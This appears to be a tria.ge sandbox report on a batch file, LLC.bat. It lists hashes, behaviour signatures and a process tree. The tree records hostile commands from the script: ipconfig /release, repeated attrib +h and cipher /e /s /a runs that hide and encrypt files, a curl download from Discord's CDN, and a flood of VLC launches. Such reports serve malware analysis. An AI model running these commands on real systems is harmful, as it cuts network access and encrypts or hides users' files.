Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
104s -
max time network
161s -
platform
windows11-21h2_x64 -
resource
win11-20231215-en -
resource tags
arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system -
submitted
31/12/2023, 21:39
Static task
static1
Behavioral task
behavioral1
Sample
LLC.bat
Resource
win11-20231215-en
General
-
Target
LLC.bat
-
Size
3KB
-
MD5
1a4a3755af6eb2406f9da11cc06a0a71
-
SHA1
7e21dd61784d928dde11ab5798a928a8458c374d
-
SHA256
c3ad48f963fd33ee2a9e19d81ea2f5e27dedb01fabbce23b965d381db5f1c05d
-
SHA512
86e0128a6fd924db8858d3492a26fd86ea74abd6dbbf26742fe9decb3a23e03c4fc626fed33bd7ce4d5b9077f73913efe5bd4889b45d53619e0c9cb2c638651a
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4724 ipconfig.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4348 vlc.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1008 msedge.exe 1008 msedge.exe 2092 msedge.exe 2092 msedge.exe 3988 msedge.exe 3988 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4348 vlc.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 2092 msedge.exe 2092 msedge.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: 33 3576 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3576 AUDIODG.EXE Token: 33 4348 vlc.exe Token: SeIncBasePriorityPrivilege 4348 vlc.exe -
Suspicious use of FindShellTrayWindow 29 IoCs
pid Process 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 4348 vlc.exe 4348 vlc.exe 4348 vlc.exe -
Suspicious use of SendNotifyMessage 15 IoCs
pid Process 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 2092 msedge.exe 4348 vlc.exe 4348 vlc.exe 4348 vlc.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4348 vlc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 412 wrote to memory of 2092 412 cmd.exe 82 PID 412 wrote to memory of 2092 412 cmd.exe 82 PID 412 wrote to memory of 4724 412 cmd.exe 85 PID 412 wrote to memory of 4724 412 cmd.exe 85 PID 2092 wrote to memory of 2288 2092 msedge.exe 86 PID 2092 wrote to memory of 2288 2092 msedge.exe 86 PID 412 wrote to memory of 3856 412 cmd.exe 87 PID 412 wrote to memory of 3856 412 cmd.exe 87 PID 412 wrote to memory of 2872 412 cmd.exe 88 PID 412 wrote to memory of 2872 412 cmd.exe 88 PID 412 wrote to memory of 1920 412 cmd.exe 89 PID 412 wrote to memory of 1920 412 cmd.exe 89 PID 412 wrote to memory of 4860 412 cmd.exe 90 PID 412 wrote to memory of 4860 412 cmd.exe 90 PID 412 wrote to memory of 3432 412 cmd.exe 91 PID 412 wrote to memory of 3432 412 cmd.exe 91 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 4792 2092 msedge.exe 92 PID 2092 wrote to memory of 1008 2092 msedge.exe 93 PID 2092 wrote to memory of 1008 2092 msedge.exe 93 PID 2092 wrote to memory of 232 2092 msedge.exe 95 PID 2092 wrote to memory of 232 2092 msedge.exe 95 PID 2092 wrote to memory of 232 2092 msedge.exe 95 PID 2092 wrote to memory of 232 2092 msedge.exe 95 PID 2092 wrote to memory of 232 2092 msedge.exe 95 PID 2092 wrote to memory of 232 2092 msedge.exe 95 -
Views/modifies file attributes 1 TTPs 7 IoCs
pid Process 3856 attrib.exe 2872 attrib.exe 4860 attrib.exe 3640 attrib.exe 3576 attrib.exe 3032 attrib.exe 224 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LLC.bat"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:412 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://media.discordapp.net/attachments/1171199057348263996/1171261368717037700/Jq9XNeo.jpg?ex=659ca2a7&is=658a2da7&hm=e584359e6d8774a5d4d4f23f6b5f2b20a2715bdcc056d11f5fe0c641e0d9fc15&2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffbba6f3cb8,0x7ffbba6f3cc8,0x7ffbba6f3cd83⤵PID:2288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,216666114260197907,3886435028509903258,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1888 /prefetch:23⤵PID:4792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,216666114260197907,3886435028509903258,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:1008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,216666114260197907,3886435028509903258,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:83⤵PID:232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,216666114260197907,3886435028509903258,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:13⤵PID:2824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,216666114260197907,3886435028509903258,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:13⤵PID:2700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,216666114260197907,3886435028509903258,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3988
-
-
-
C:\Windows\system32\ipconfig.exeipconfig /release2⤵
- Gathers network information
PID:4724
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\LLC.bat2⤵
- Views/modifies file attributes
PID:3856
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:2872
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:1920
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:4860
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:3432
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:3640
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:3888
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:3576
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:2284
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:3032
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:944
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:224
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:2304
-
-
C:\Windows\system32\curl.execurl -o LC.mp4 "https://cdn.discordapp.com/attachments/1177310897123885067/1191116864877776957/lv_0_20231231143029.mp4?ex=65a44506&is=6591d006&hm=ab14c09f3cb8f91653be510f41d1f2fc5e1c634bb2f47701957dddc9183b5ae8&"2⤵PID:3412
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4348
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2780
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:1460
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:4484
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:1064
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3404
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:1840
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:336
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:4388
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:800
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2468
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:5080
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:5076
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2396
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3820
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:4104
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:1244
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2444
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2888
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3492
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:1116
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:4620
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:432
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3212
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:4988
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:5040
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:4244
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:4288
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:1304
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2780
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:4400
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:4592
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3844
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3852
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2388
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3524
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2304
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2824
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3520
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:5072
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:4576
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:952
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:1436
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3440
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3404
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:1408
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3228
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2824
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2668
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:3184
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:4688
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\LC.mp4"2⤵PID:2348
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4412
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4656
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D0 0x00000000000004BC1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3576
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD592e040d7c1eeb7646714b53e4a95eb91
SHA14eaae5706d13b5f0ca9f2e4c994cfca63890dd7d
SHA2565342d5a6f08451e0f1c54f8e3658dd91eeba2be804f3582ddf8d6a4e2d0c6468
SHA512e5b4c0ee79b7536679bf2e54f865f91b4957d4f66e498a026b88a6c14a13163f897f54baa9da747c1523eaf20d29cca960b8949a08a7b0ab9b0bbe92478a34f8
-
Filesize
477B
MD5b48c97183bf8eefa5f93f8cc35d53f61
SHA1083522bfcfd5e999bab3812a1143eecc26c68b62
SHA25661d6e3061e34068ad858b13f3b9eec36195b9b50ec4a7d082def73ae3851b752
SHA512c4f8db1dd2db03b83f7a2a58ec2dad32675b1ba6dd2b047ec36c53d4a85fcb00c0c01d06385ab6d051afd714916b26d4b000daa0b280b5bd5af395bb9ca11a6c
-
Filesize
4KB
MD5744ed8d5bc0f1e57f2677dc8f47cf09b
SHA104654732012af75ca2966383157dd86db4b52513
SHA256768baded1527480f94af7d8753ec21c9c99de7a97aa5ccbd8c50cc3cdfc14e1e
SHA512ff0e4ad8376657088f67bec645823f9dc597f9b329e7b2e4bcc199db5737f6c8e6135296c8f58fa8866b65f51bbdfa3c94e6ccc353196e85f52f868c60feece7
-
Filesize
6KB
MD5bbcce05031a85dad825d8392418eaa9a
SHA1132db1df40bb604c818b430c948c54c571c729e6
SHA256322d7662b1755f8ded336775a666d0acfa1a6067bc0b9c4d1d63ad3707535e3a
SHA512ebb5b2ecfd509d70d5d7d49d7c8ba639e91dfc1a685f881c424463968294e0fd4d1df19decafdff1b4c5aceef314a77c79db1ab9fb328d3707bc0f6b15c97023
-
Filesize
25KB
MD5eee2fbb6857a779ffe6d81a6475cce9b
SHA1b163b8f337ff09ee49dfe537960f998b102067d3
SHA256d885cd9715930ca5d4b2e54e3cf76017d9d9fdc46c1b6a7196476f377144505b
SHA5123a71d1194b06359c1d8029d549198bd1d5fe56a73adbd215123d32d3ba880660e41fe9fede41f358fddc77d9cee392fe3c213ab3e8408a014fd3e7c0ae0ad28b
-
Filesize
10KB
MD57bf036d03f319f665faceaa606d3559a
SHA1c1688a56a5baffe61a343e81e9ff021e444fd753
SHA2560e330d9f01baaabd80f262f68998a4a16d3bb24cb4f4248f736c950a97b74bc2
SHA51273f0470618f8914226b835f8f382b8880aad0a9a109d43b0fda52bfd3fa7be990f3a1ada9c4818745f20031acbe9ddf1b4a4bbe4dcc23957c2af06384ac8fa82
-
Filesize
66B
MD5b00bea45adcd41a95463dd463d14bf1d
SHA181d70f612006ba31d19f3f163973a03e4a5bd5c0
SHA256446adf3211ba11382e10403c0826a98449fcbcdeff03e716f0135a82107e9517
SHA5124f50b4449dd250656a2d66595ffa492f6a040745afc04b29c8ef854dfe0bd58ebbca97afdccbac7d78154f7b0e85a708dd7d22bb64d039f261d2019f80a4a20c
-
Filesize
65B
MD5c19f1d3876adb050f81184b11bca9c6b
SHA1b477ecae9dd61fc352ccd259803ab806bd36e57c
SHA256c48689aa862190a7e7a88963674f79b12787db95aeb5575449cc790180d0e265
SHA5122a0e96819769bfa7ac6099b209d4e1ff301b08083f4f2372a383093dbf7443db701ccff35e2046b282ab9d8449d456e4deee0495228f19ca2e57a3ba231c549e
-
Filesize
18B
MD57c8e809e8725cf4e9894e0e0487c8ecf
SHA1e5a66ebce34fbc44c5caaa8f84228aa3fd3ca312
SHA2566e63cbe8719a8702b4164d9671bb0a7120f54d9eceb0826f0a1511f28713bf9b
SHA512ca9717243cb4537f1738bf7d0bf54337e40ebca63eeef26169c07c1958e4bbd7839132efcbf59c8067a4cd9c355c2aca370a20b8a61305540b95ad867a2dc3ef
-
Filesize
138B
MD5dc22ee5d7cdb4734c62f4a07b905822d
SHA188ab21f5ace9306b039f2d2d675769de70d337fc
SHA256b500888ab41a08c77422a9b299ebe6c670a15bdee61bb1505fa22e33dd54fb54
SHA512c61c4405d64d1efea0dba5c11cbbac905b1ed0dfa58c74e4b88091dac954e0988492aec36b4595e21a7c19ce1dec1a76595bf24c7ac7e46e7a558a6775ce27a5
-
Filesize
132B
MD5460791485d870c39dc5273ea2ddfc119
SHA1a247fb46e29831ebea2c4984061a1c80ed67295f
SHA256257ea28c54cdb0fea4cb56dd97067978cde53585872fe22eb6f152d20bff1251
SHA512e64ef367731ba22232fb1112aeafc0f2098a05321098f481d45e6e10b74ff645ed644c8c511e5cfafcf16e0da9c91c2641ed5aa8f6fbb36a43445d013f0e3e52
-
Filesize
4.6MB
MD55f7aac998db63acc3b77fd064714659a
SHA1712c457a83cdba6bccd4b1021f710a0121d9d981
SHA25609908ae87b8369921c5f7b980d5f4c55b3430984ff33c600f45d3fceab81685e
SHA51268f788391df5401a097fcf811052414d330a05102947f28d027cd1a2a1f2f07bbd4fab908b9602abd9d14f14d3318fd199159ed952b954ffc4e90a9224a8efd6